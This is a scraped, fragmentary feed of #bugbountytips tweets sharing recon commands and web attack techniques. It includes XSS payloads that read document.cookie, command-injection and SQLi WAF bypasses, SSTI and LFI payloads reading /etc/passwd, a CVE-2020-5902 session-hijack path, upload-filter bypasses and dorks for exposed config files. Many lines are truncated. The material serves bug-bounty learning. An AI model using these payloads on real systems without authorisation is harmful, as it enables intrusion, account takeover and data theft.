#bugbountytips #bugbounty https://t.co/H4uup4L6iE

RT @trbughunters: ⛓️Get Reflected XSS within 3 minutes ⛓️

@gkhck_ from our community, wrote a write-up about the xss recon methodology!

https://t.co/FukL4nlNvc

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip

RT @praseudo: Want to know which web files on a website are cached? Here is an online

https://t.co/YQJaWQBEps

#bugbounty #bugbountytips #hacking #Recon #recontips #bugbountytools https://t.co

RT @niravsikotaria: Dear @pdiscoveryio 😍

Thanks for "httpx" tool works like Jet Plane🚀

#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx

RT @m4ll0k2: Simple tool for get domain relationship.. https://t.co/MuLnPJH5SQ - @Jha
RT @harshbothra_: Simple Oneliner to Filter out Domains with "200 Status" and further

cat domains.txt | httpx -follow-redirects -status-code -vhost -threads 100 | sort -u | gre

#bugbountytips #bugbounty #security #infosec

RT @harshbothra_: Found an API Key/Secret/Token - Not Sure whether to report it or n

@udit_thakkur Thanks for a good tool ;)

#bugbounty #bugbountytip #bugbountytips https://t.co/LFEbSVE9PN
RT @gwendallecoguic: #onliner to extract endpoints from JS files of a given host #BugB
Regexp dependant so highly improvable!
https://t.co/4kBajZpIV8 https://t.co/T7F7tYaG0Q
RT @11xuxx: LFI to RCE
1. ffuf on "/" -> "redacted-api" -> 302
2. ffuf on "redacted-api/" -> "application.wadl" -> 200
3. all operations were auth protected
4. didn't give up and tested ~200 operations
5. fount LFI, no auth
6. admin creds in plaintext, logged in and got RCE
#bugbountytips https://t.co/1LUz8GyaZB
RT @pdnuclei: Here is how you can use #httpx to import a list of

a) URLs
b) Subdomains
c) Endpoints

to Burp suite for further crawling or scanning.

#bugbountytips #pentest #security #hackwithautomation #burpsuite https://t.co/jjxcK

RT @AbhishekKarle3: I just published How I was able to change victim’s password using

Thanks to @musiclouderlml for sharing #bugbountytips

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Tismayil1: Imperva Waf XSS ByPass :

Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9

Codepen : https://t.co/0ot0RTvp39

#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/kFIWRcOQWW

RT @Random_Robbie: <?php var_dump(explode(',',ini_get('disable_functions'))); ?&g

Handy as hell tip for checking which functions you need to by pass on PHP RCE.

#bugbountytips #bugbountytip
RT @hacktory1: 6 steps and 2 tools to attack JSON Web Token
https://t.co/uRHKNn6pSW
https://t.co/PBDNgsjLnh

#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec

How to Answer tricky Javascript Interview Questions | Weird Javascript | https://t.co/c
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @chiraggupta8769: one-liner to extract endpoints from JavaScript files by @renniepa

cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s

#bugbountytips #bugbountytip #bugbounty https://t.co/xk345N4yXN

RT @SalahHasoneh1: ️Way to bypass 2FA ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht

RT @vNature0: Could you please recommend tools/scripts to test for known vulnerabilit

My website has been receiving some attempts of doing random stuff from Russia so I wa

Thanks!!

#bugbountytips #bugbountytip
Could you please recommend tools/scripts to test for known vulnerabilities?

My website has been receiving some attempts of doing random stuff from Russia so I wa

Thanks!!

#bugbountytips #bugbountytip
RT @roughwire: Duplicates specially RCE on bugbounty program makes you feel hell.
#bugbountytips never check your hackerone notification before going to bed specially w
RT @dark_warlord14: New write up around ffuf to help you speed up few things during p
Blog: https://t.co/NucgVotBwn
I hope it helps you in someway. Retweet if you like. Happy Hacking!!
#bugbounty
#bugbountytips https://t.co/K9MPwR3EX8
RT @MrrFawadkhann: Eid Mubarak to everyone

#bugbountytips #BugBounty
Eid Mubarak to everyone

#bugbountytips #BugBounty
RT @Tismayil1: Yes I awarded 5000$ in Private Program.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty
- SQL'injection with WAF ByPass

If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly. https://t.co/wj82tcFJXb
RT @11xuxx: Using ffuf the right way and gaining admin access
1. "ffuf -u ... --mc all" -> match all response codes
2. ctrl+c after 5 sec
3. "ffuf -u ... --mc all -fw ..."
4. found a backdoor developer used to login as admin (response code 404)

all credits goes to @joohoi

#bugbountytips https://t.co/0id7geVEyE
Wait !! Are you serious? are you going to help ppl to learn smt could really make an impa
Once I realized the trick to @adamtlangley's "I once was blind but now I RFC" challenge

TIL @PortSwigger's Burp Collab does SMTP!

This is insaaanely useful.

#bugbounty #bugbountytips https://t.co/1Xdo79FEUG

RT @shreyasrx: Command injection 💥
Filter Bypasses >

1/3

cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd

#bugbountytips
#shieldindia
#commandinjection
RT @abhishake100: I just published "Bug Bounty in Lockdown (SQLi and Business Logic
#bugbounty #bugbountytips
https://t.co/MbpxArExBD
RT @CristiVlad25: Tools for #bugbounty hunters. With @InsiderPhD

#bugbountytips #bughunting #ethicalhacking

https://t.co/SAJb6TjKMm
Tools for #bugbounty hunters. With @InsiderPhD

#bugbountytips #bughunting #ethicalhacking

https://t.co/SAJb6TjKMm
RT @D0rkerDevil: Escalated a blind python code injection to
rce , Thanks to @imhaxormad for the help.
another #DNS_BASED_EXFILTRATION
just decode the output from base64
and you will get

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/

#bugbounty #dnsexfil #bugbountytips https://t.co/YYr8H5h6Qz

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

Top 25 Remote Code Execution (RCE) Parameters

#bugbountytips #bugbountytip #bugbounty https://t.co/2JI8LraxWV https://t.co/uL0

️️Ways to bypass rate limit ️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

- SQL'injection with WAF ByPass

If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/HNM
RT @sh0mbo: Need to trigger that xss payload, but parens are filtered? EZ!

Function`return alert````${document.cookie}`

#xss #payload #filterevasion #bugbountytips #bugbounty

RT @joeldeleep: A good way to run linkfinder if you have a list of js files #infosec #bugb
RT @Tismayil1: Yes I earned $3180.

Tools :

Sub Scanner : https://t.co/LegySAU3sZ

Dir Scanner : https://t.co/1L6MutcaEc
Git Dumper : https://t.co/IOsHlTWCP2

#BugBounty
#bugbountytips
#bugbountytip
#whitehat
#infosec https://t.co/6Qy1JEiDWM

RT @Tismayil1: I Earned $XXXX OS Command Injection Private Program.

Used Repos

1 : Dir Searcher : https://t.co/1L6MutcaEc

2 : Sub Scanner : https://t.co/ZRcZb6ovUa

#BugBounty
#bugbountytips
#bugbountytip
#whitehat https://t.co/OPOc6mVkTc

RT @_0nk4r_: Subdomain Takeover 101 ..@EdOverflow Great Blog

learn a lot
https://t.co/xAHIs10wiQ
----
#togatherwelearn #bugbountytips
How to Answer tricky Javascript Interview Questions | Weird Javascript |... https://t.co

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

Duplicates specially RCE on bugbounty program makes you feel hell.
#bugbountytips never check your hackerone notification before going to bed specially w
Here is a way to escape a restricted shell in linux
#bugbountytips

What would you have done to escape a restricted shell? https://t.co/BzI7PLslmb

How to Answer tricky Javascript Interview Questions | Weird Javascript |... https://t.co

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

#programfolback #tutorial #code #opensource
RT @SatyamGothi: #bugbountytips for sure💯
A M A Z I N G #bugbountytips #bugbountytip #infosec https://t.co/sOAjMOXHt5
#bugbountytips for sure💯
RT @d3tonator: Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP

If bypass successful, & after a while blocking request again. Increment the last oct
#infosec #bugbountytips

RT @d3tonator: Easy Money | P3 MAP API | Android

1. Open the apk in Jadx-gui
2. Go to Resources.arsc > res > values > strings.xml
3. Here you'll find the Google Map API Key
4. Open the URL https://t.co/1dNXVN63B4{API_Key}
Map open then report it
#BugBountytips #Android #bugbounty #infosec
Wanna know the best way to be demotivated in the bug bounty field?

Compare yourself with others!

#bugbounty #bugbountytips
RT @InonShkedy: A series of articles I wrote about major changes in app development (

1: Modern vs. Traditional apps:

https://t.co/GUGjFHQWDR

2: What is Modern AppSec:

https://t.co/ewbpqgZFC9

#bugbountytips
RT @farah_hawa01: NEW VIDEO: In this video, I tak about SAML authentication, SSO’s,

https://t.co/erMuqop3vc https://t.co/iAU9QSV0nO
RT @BeingjokerMeme: How to Answer tricky Javascript Interview Questions | Weird Jav

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

How to Answer tricky Javascript Interview Questions | Weird Javascript |... https://t.co

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

How to Answer tricky Javascript Interview Questions | Weird Javascript |... https://t.co

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks

RT @s3rgiomazari3go: Some of the resources most of the professional people recommen
1.https://t.co/SveHxbs2Nr
2.https://t.co/I8colHHkwB
3.https://t.co/eMCUzhjaqf
#bugbountytips
RT @VirenPawar_: Second medium blog-post:

Stealing your Paytm information using XSS

https://t.co/0UqAhWbzzl

#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring

RT @amad3u6: You can specify memory size for @Burp_Suite to make it more smoother

~$ java -jar -Xmx3072M /path/to/burpsuite.jar

or

~$ java -jar -Xmx3G /path/to/burpsuite.jar

#bugbountytips #bugbountytip #bugbounty #infosec

RT @HossamSec: To test XSS + SQLi + SSTI/CSTI with the same payload use :

'"><svg/onload=prompt(5);>{{7*7}}

' ==> for Sql injection

"><svg/onload=prompt(5);> ==> for XSS

{{7*7}} ==> for SSTI/CSTI

#bugbounty #infosec #TogetherWeHitHarder #bugbountyprotip #Pentesting #bugboun
RT @ajdumanhug: I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out
I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out these platforms an
RT @SalahHasoneh1: ️Extract endpoints from APK files ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

#bugbountytips #BugBounty https://t.co/7pxhZ6gRgo
https://t.co/IqiCVzbCkd MR r0b0t.clip >>> #blockchain #opensource #linux #
Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot

#bugbountytips #BugBounty #bugbountytip https://t.co/Rf4Vfwmfp2 https://t.co/Lu

Bug bounty fast hunting find all subdomains using all tools and then use all endpoint gra
RT @HackerOn2Wheels: Content Type Forcing - The XSS you may have missed.

This is my quick and practical blog post on how to get XSS in responses with Content-Ty

https://t.co/LgaPBZuAR4

#bugbounty #bugbountytip #BugBountyTips #infosec

Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
https://t.co/6LGDGTiI0m
#PenTest #Hacking #bugbountytips #redteam
RT @0xrudrapratap: @intigriti #bugbountytips
@intigriti #bugbountytips
RT @sw33tLie: Friendly reminder that zdns > massdns #bugbountytips
RT @LooseSecurity: I once exploited SSTI in flask app with payload:

{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").r

If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountyt

payload not by me
Dear @pdiscoveryio 😍

Thanks for "httpx" tool works like Jet Plane🚀

#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx

Bypass CSRF like a boss. Seven ways to bypass CSRF security by @harshbothra_

https://t.co/F6IYxtD5Xa
#csrfbypass #bugbounty #cybersecurity #bugbountytips
RT @AmitMDubey: A small Burpsuite trick which helped me to find Blind SSRF -

Step 1: Use Intruder to Bruteforce Headers

Step 2: Add Burp collaborator URL as value.
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Tarborator Extension to monitor hits

#bugbounty #bugbountytips https://t.co/lLzBZf5KZU

RT @secalert: Regarding CVE-2020-5902:
[https://{host}]/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?director

there you will see the session files like:

"sess_XXYYXXYYXXYYXXYYXXYYXXYYXX".

Set this in the cookie and you are in admin's session. #bugbountytips
RT @hackison: #bugbounty #bugbountytip #bugbountytips #hacking #hackison #hacke
Find SSRF issues via inject headers (like x-forwarded-host,..etc) with this tool:
.
https://t.co/C2E8XUKGRz
#bugbountytips #bugbounty https://t.co/OEkYLIt3YE
RT @C1h2e11: A tips from Nahamsec @NahamSec
curl -X GET https://t.co/pIuaaFEPZL{organization}
https://t.co/5XaiHYznhj{organization}
https://t.co/7AlvIjzWht{IP address}
Shodan search query ASN:{ASN}
#bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
RT @HusseiN98D: WooT! There is always a way. New #bugbounty #pentest short write u
https://t.co/nlAv4pMPhx
RT @HusseiN98D: A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! AL
I'm interested in any security research team / pentest work (remote). If any company/t
Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips https://t.co/lOS0parDCn
RT @SpiderSec: 2FA Bypass Technique
#bugbounty #bugbountytips https://t.co/l0bB4NVGZl
RT @1m4xx0: And sometimes for (LFI)

url?para=//..//..//..//..//..//..//..//..//etc//passwd//

Works!!

#bugbountytip
#BugBounty
#bugbountytips
#bugbounty
RT @ja1sharma: Infosec meme for BugBounty hunters.
#Bugbounty #BurpSuite #Scanner #bugbountytips #infosec #MEMES #XSS #SQLi https
Shellshock still work for some server you can also try
nmap script.
Nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty https://t.co/hWfe6AZWsi
RT @malcolmx0x: host:attacker,com>> blcoked

host:attacker,com
x-forwarded-host:target,com>>ATO
#bugbountytips
RT @HossamSec: Add this endpoint to your DIRs list You may get lucky and access a das

/uplynk/examples/dash.html

Make your own private lists of DIRs while hunting and you may get lucky and access crit

#BugBountyTips #infosec https://t.co/nfI5oSQ4jW

RT @HusseiN98D: Analysis of an RCE I found past week. RT and Like if you want more! I
Part 1: https://t.co/gQHKx5lpas
Part 2: https://t.co/TcnApVmJP7
#bugbountytips #bugbounty
RT @Santhoshvr97: use file:// instead of http:// in parameter.
sometimes it will bypass URL restrictions while redirect in page and use this payload to
it will work.. ✌️
Payload: file:///</script><script>alert(1)</script>

#bugbounty #bugbountytips #infosec

#xss
RT @anspattnaik: #bugbountytips #BugBounty
Just exploit template injection vulnerability {{7*7}} = 49
and I m pretty sure it's using Jinja2 template but when I trying below payload results ar

{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}

any suggestions?
RT @Sahad_nk: Found a JIRA SSRF and want to make it more impactful? Look for what's

#BugBounty #BugBountyTips #HackerOne #BugCrowd #Synack https://t.co/LtTsSpokH

RT @hackison: [Sensitive Directories] intitle:"Index of" wp-config.php

[Sensitive Directories] intitle:index.of./.sql

[Pages Containing Login Portals] site:*/cgi-bin/login.html

[Various Online Devices] inurl:ftp://ftp robots.txt

#dorks #hacking #bugbountytip #bugbountytips #pentesting

RT @HusseiN98D: Time for another #BugBountyTip : While testing file upload forms on I
RT @0x240x23elu: Find subdomain CNAME with one liner #bugbountytips #bug #subdom
This is my be old https://t.co/KUPHVhMhct
RT @noobsec_org: Always view the page source code, sometime u get some GOLD like m

#bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehithard

RT @HusseiN98D: #BugBountyTip time: combine Arjun from @s0md3v with BurpIntuder
#bugbountytips #pentest RT & L
RT @HusseiN98D: #BugBountyTip time: I've got a RCE by using this tip: while testing fo
Sometime this fools the backend and you get shell! RTs & comments are appreciate
RT @cry__pto: Best #firefox addons for #Hacking:
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest

RT @HusseiN98D: #BugBountyTip time: when you see a POST request made with JSON,
Follow, book coming!
RT @TakSec: XSS filter bypass using stripped </p> tag to obfuscate.

P2 Stored XSS $1500 on a private bug bounty program.

XSS Payload:
<</p>iframe src=javascript:alert()//

#xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic https://t.co/ltj

RT @bugbountyvillag: Tip by @thedawgyg

When testing for SSRF using a black list, take internal IP addresses and when encoding

#bugbountytip #bugbounty #bugbountytips

RT @YourNextBugTip: All CSRF Bypasses from all over the net.

Last one is the most interested one (bypass XHTTPRequest check using flash), but not e

Did I miss anything?

#bugbountytips #bugbountytip #bugbounty https://t.co/f6VrZlivFz
RT @bugbountynights: You can check Jira Information Disclosure vulnerability (CVE-201
RT @mrunal110: Find CNAME Records #bugbounty #vulnerability #informationsecurity #
#Bugbountytips https://t.co/6EjP0xZQ3b
RT @_Y000_: Ondblclick xss Payloads

<h1 ondblclick=alert`_Y000!_`>_Y000!_</h1>

<marquee ondblclick=alert`_Y000!_`>_Y000!_</marquee>

<xss ondblclick="alert`_Y000!_`" autofocus tabindex=1>_Y000!_</xss>

<w="/x="y>"/ondblclick=`<`[confir\u006d`_Y000!_`]>z

#xss #payloads #bugbountytips

RT @kobsoNinja: Bypassing SSRF Filter using Enclosed Alphanumerics

AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④

Credit: @EdOverflow
#BugBountyTips
RT @ankit_2812: Bugbounty tips#2
Try this MySQL tricks to break some #WAFs out there.

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

#SQLi #bypass #bugbountytip #bugbountytips #hackerone #HackThePandemic #hacke

RT @AbdoFarwan: Notes from @NahamSec's awesome interview with @inhibitor181.
#BugBounty
#bugbountytips https://t.co/V9kNVbuxT1
RT @Jhaddix: I know it's common sense but remember when parsing JS for endpoints/fi

/ = Root directory
. = This location
.. = Up a directory
./ = Current directory
../ = Parent of current directory
../../ = Two directories backwards

#bugbountytips ?
RT @HusseiN98D: Simple script to gather all TLDs of a company:

value=$(echo $1|cut -f1 -d.)

echo $value
sed -e "s/^/$value./" /root/wordlist/tld.txt | filter-resolved

Usage: bash https://t.co/ekil2jT7Im https://t.co/PWAspnKSB5

#bugbountytips #bugbountytip https://t.co/HWeUUi3aFu
RT @Yumi_Sec: If a web application allow you to upload a .zip file, zip:// is an interestin

#BugBounty #BugBountyTips #InfoSec https://t.co/gB9uC4vSPw

RT @HusseiN98D: Testing Password Reset Functionnalities . If you can think of other tes
#BugBounty #BugBountyTips #BugBountyTip #pentest https://t.co/esiC6PjUMD
RT @mark_valenzia: Massive thanks to @d0nutptr for his awesome blog on SSRF and @s
#bugbountynoob #bugbountytips https://t.co/2OTvxBLxIe
RT @pwntheweb: Bypassing most FILE Uploads filters for $$$$

* .htaccess <- upload htaccess

* file.svg <- uploading svg = xss
* file.SVg <- must try case mismatch
* file.png.svg
* file.php%00.png
* file.png' or '1'='1
* ../../file.png
* file.'svg <- invalid ext.
#bugbountytips #BugBounty

Done with subdomain enumeration? here is how you can get more assets related to you

#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips https://t.

RT @shreyasrx: Cambium ePMP 1000 Vulnerable for Command execution and changing o

1/2
Google dork >

intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*

A Lot of hosts are still vulnerable.

#bugbountytips
#shieldindia
#Hacking https://t.co/cmclnV5DTh

RT @gwendallecoguic: Short @oneliner to retrieve altnames from ssl certificates. Thanks

https://t.co/t2hyxeD99E https://t.co/uBwdSCnvzI
RT @SalahHasoneh1: ️Price Manipulation Method 3 ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht

RT @debangshu_kundu: Just bored.
So posting this poll.
What was the most exciting bug you've ever found?
Doesn't necessarily need to be your highest paid bug!
Vote and comment down below
#bugbounty #hacking #bugbountytips #bugbountytip
#infosec Hashtags for reach XD
I just published Android App Security & Testing https://t.co/cQWTaOqQ5w

It was long pending, found a draft in my notes, corrected it and thought why not share i

#androidsecurity #bugbountytips #bugbounty

RT @_sickwiz: Another govt website. Reported to @NCIIPC . Though they don't offer bou

#bugbountytips #cybersecurity #Ethicalhacking #rvdp #vulnerability https://t.co/Mhua

Another govt website. Reported to @NCIIPC . Though they don't offer bounty but this ap

#bugbountytips #cybersecurity #Ethicalhacking #rvdp #vulnerability https://t.co/Mhua

RT @Jhaddix: #bugbounty #bugbountytips People sometimes ask how you can "eyeball
discovery! https://t.co/PDGu7IHYk3
A series of articles I wrote about major changes in app development (microservices, CI/

1: Modern vs. Traditional apps:

https://t.co/GUGjFHQWDR

2: What is Modern AppSec:

https://t.co/ewbpqgZFC9

#bugbountytips
RT @Debian_Hunter: Best place for understanding Graphql , thnx man #bugbountytips #
RT @0xLupin: That's why you should stop reporting a simple alert box and start thinking

If you don't trust my words trust @MrMustacheMan3 and @brutelogic :)

#hacking #bugbounty #bugbountytips #hacker #XSS #RCE https://t.co/PE8FwIebBp

RT @neutrinoguy: Best way to search Project Sonar database for subdomain enumeratio

https://t.co/t5WYUzjvvp

Credits to @CalumBoal
#bugbountytips
RT @ssh0x00r: thanks a lot 💝,
@NullByte @HackerSploit @LiveOverflow @stokfredrik @Jhaddix @CristiVlad25 @cry__pt
@InsiderPhD @thecybermentor

#bugbountytips #Pentesting #hacking #infosec

thanks a lot 💝,
@NullByte @HackerSploit @LiveOverflow @stokfredrik @Jhaddix @CristiVlad25 @cry__pt
@InsiderPhD @thecybermentor

#bugbountytips #Pentesting #hacking #infosec

RT @BeingBharatiyaa: @AmazonHelp @amazon getting error page by clicking on 'Comm
@AmazonHelp @amazon getting error page by clicking on 'Communication Preferences'
RT @bountyhunter_fr: Subdomain recon tools step by step :

1) amass - scan for subdomains

2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports

#bugbountytips
RT @AldenAous: Imperva Waf XSS ByPass :

Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9

Codepen : https://t.co/ls37WLuqEK

#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/fB2kjCvZVn

RT @OAcybersecurity: FORD Session token URL lead to Reflected XSS #bugbountytips #
RT @sillydadddy: #bugbountytips

Does anyone has list of root domains of all public programs in the BB platforms ?
Could you please share ?
If not I am planning to make one and share

thanks
RT @Rajat_sharma111: Recently, I have started using the tool "Arjun" for finding the hi
Best place for understanding Graphql , thnx man #bugbountytips #bughunting #infosec
“Learning path for Bug Bounty” by Udit Bhadauria https://t.co/NpscvKutUB
#cybersecurity #bugbounty #bugbountytips
RT @adrien_jeanneau: A little #BugBountyTips that I use for my recon: use this Google D
RT @rapiddns: The https://t.co/S8Mkzf3yAd Updates.

Added:

[*] 360 million mx records

[*] Support CIDR format query
[*] Subdomain query matches cname records

Removed:

[*] Recent query

#recon #bugbounty #bugbountytip #bugbountytips #hackerone https://t.co/59wNXBx

RT @s3rgiomazari3go: Note 3: Google Chrome uses an XSS auditor, which when testing
#bugbountytips #infosec #hacking
RT @thedarkwayg: Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty

The payload: javascript:@youtube.com

Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd https://t.co/PrTMuJqKNA
RT @ryan_kl_ko: #uqcyber PhD student Walt Lin sharing his story on how he discovered
Note 3: Google Chrome uses an XSS auditor, which when testing thinks that you are doin
#bugbountytips #infosec #hacking
RT @cyberdefender5: Successfully Completed ✌✌🏻✌🏻 #Lookingforward #moretocome

#Thanksalot #Akhilbro #Ersegment #Ethicalhackingtraining #Bugbountyhunting #Cybe

Successfully Completed ✌✌
🏻✌🏻 #Lookingforward #moretocome

#Thanksalot #Akhilbro #Ersegment #Ethicalhackingtraining #Bugbountyhunting #Cybe

A good way to run linkfinder if you have a list of js files #infosec #bugbounty #bugboun
RT @Sudhans42246878: It's 6 35 I'm The morning
Couldn't sleep whole night
And now when I have come to bed ....I still can't sleep cause
I am hunting bugs and thinking of all the possible ways I can break into an WebApplicat
Is it a sign I have become one??🙄
#bugbountytips
It's 6 35 I'm The morning
Couldn't sleep whole night
And now when I have come to bed ....I still can't sleep cause
I am hunting bugs and thinking of all the possible ways I can break into an WebApplicat
Is it a sign I have become one??🙄
#bugbountytips
RT @renniepak: Check for stored XSS in emails. The email itself obviously doesn't trigge
RT @Xer0Days: Changed @0xbharath's VirusTotal sub-domains enumeration script. Craw

@appseccouk #bugbountytip #bugbounty #recon #bugbountytips

https://t.co/6JXlkUtURd
#httpx v0.0.7 updates:-

☑Added TLS Probe (Subdomains from SSL)

☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length

https://t.co/baW40ThDCi

#hackwithautomation #bugbounty #security #bugbountytips https://t.co/caIs5Uz6Tu

RT @INR_0x0Ma5K: My first Hall of fame for this platform @Bugcrowd, to happy and righ
Most of Duplicate. This one is boosting point for my side.
#bugbountytips #Bounty #hacklearning https://t.co/m87mJH0Krx
My first Hall of fame for this platform @Bugcrowd, to happy and right path to servey. Ple
Most of Duplicate. This one is boosting point for my side.
#bugbountytips #Bounty #hacklearning https://t.co/m87mJH0Krx
#uqcyber PhD student Walt Lin sharing his story on how he discovered a number of CVE
RT @hsakarp_ilajna: #Recon:
1. #Sudomain Scraping- Sublist3r, SubFinder, Amass

2 Subdomain #Bruteforcing- MassDNS with jhaddix_all.txt

3. Subdomain #Permutations scan- #AltDNS

4. #Repeat Step 2 to 3 for 3 times more to find Subs of Subs

#bugbountytips
#cybersecurity #infosec #ethicalhacking

RT @trbughunters: 🚀 CORS Protection RegEx Bypass 🚀

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://

Need to trigger that xss payload, but parens are filtered? EZ!

Function`return alert````${document.cookie}`

#xss #payload #filterevasion #bugbountytips #bugbounty

RT @rnd_infosec_guy: Bug bounty tip: don’t tweet useless bug bounty tips
#bugbountytips
RT @dhakal_ananda: Yay! I earned $100 for a 0 user-interaction Account Takeover Vuln

Try re-registering the user with the same email. If the password gets reset, you got the

#bugbounty #bugbountytips
#PmG - Extract parameters/paths from urls

https://t.co/0Oah7JwH76
#bugbountytips #recon https://t.co/09hZn9fwvq
Yay, My first writeup
